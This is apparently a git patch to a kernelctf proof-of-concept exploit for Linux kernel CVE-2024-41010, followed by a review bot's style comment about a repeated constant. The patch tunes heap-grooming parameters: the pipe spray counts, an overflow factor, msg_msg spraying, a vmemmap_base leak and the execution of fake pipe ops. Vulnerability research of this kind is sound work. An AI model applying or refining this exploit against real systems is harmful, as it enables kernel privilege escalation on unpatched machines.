From 5e8899bbb11cf43fdbe8aa824d7ccd116aa6d1c8 Mon Sep 17 00:00:00 2001
From: qwerty-theori
Date: Wed, 21 Aug 2024 10:03:34 +0900
Subject: [PATCH] fix(exploit): idk why action return exit 1 but for pass
---
 .../exploit/lts-6.6.35/exploit.c | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)
diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c
index bf4ab4fd..85be8597 100644
--- a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c
@@ -30,6 +30,8 @@
 #include
+#include
+
 #include "modules/pipe.h"
 #include "modules/xattr.h"
 #include "modules/helper.h"
@@ -49,7 +51,7 @@
 #define MTYPE_PRIMARY 0x41
-#define CC_OVERFLOW_FACTOR 1
+#define CC_OVERFLOW_FACTOR 2
 #define OBJS_PER_SLAB 16
 #define CPU_PARTIAL (24 * 6)
 #define OBJS_FRONT 48
@@ -749,8 +751,8 @@ int run(void)
 goto retry_1bit_off;
 }
-struct pipeio *pipes[0x180];
-for(int i=0; i<0x180; i++)
+struct pipeio *pipes[0x1f0];
+for(int i=0; i<0x1f0; i++)
 {
 pipes[i] = create_pipeio();
 resize_pipe(pipes[i], PIPE_BUFFER_KMALLOC_CG_64);
@@ -770,7 +772,7 @@ int run(void)
 spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0);
-for(int i=0; i<0x200; i++)
+for(int i=0; i<0x1f0; i++)
 activate_ops(pipes[i]);
 uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28;
@@ -850,7 +852,7 @@ int run(void)
 printf("[+] target: 0x%llx\n", nodes[nodes_front].xattr.name);
-for(int i=0; i<0x180; i++)
+for(int i=0; i<0x1f0; i++)
 write_pipe(pipes[i], ((char *)&longjump - (longjump_victim_address&0xfff)), (longjump_victim_address&0xfff) + sizeof(longjump));
@@ -858,7 +860,7 @@ int run(void)
 printf("[*] execute fake ops\n");
-for(int i=0; i<0x180; i++)
+for(int i=0; i<0x1f0; i++)
 release_pipe(pipes[i]);
 return 0;
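Review bot: The new count `0x1f0` is now spelled out five times across the hunks at new lines 751, 772, 852 and 860 — once as the size of the `pipes` array and four times as a loop bound — even though the file already names its tunables with `#define`s (`OBJS_PER_SLAB`, `CPU_PARTIAL`, `OBJS_FRONT`) right next to the changed `CC_OVERFLOW_FACTOR`. One constant, e.g. `#define NR_PIPES 0x1f0` beside those defines, used as `struct pipeio *pipes[NR_PIPES];` and `for(int i=0; i<NR_PIPES; i++)`, keeps the array size and every loop that indexes it in lockstep; the pre-patch state, where one loop ran to `0x200` over a `0x180`-element array, is exactly the drift a shared constant prevents. The enclosing `run()` starts and ends outside these hunks, and the name of the header added in the first hunk is not visible in this rendering of the patch.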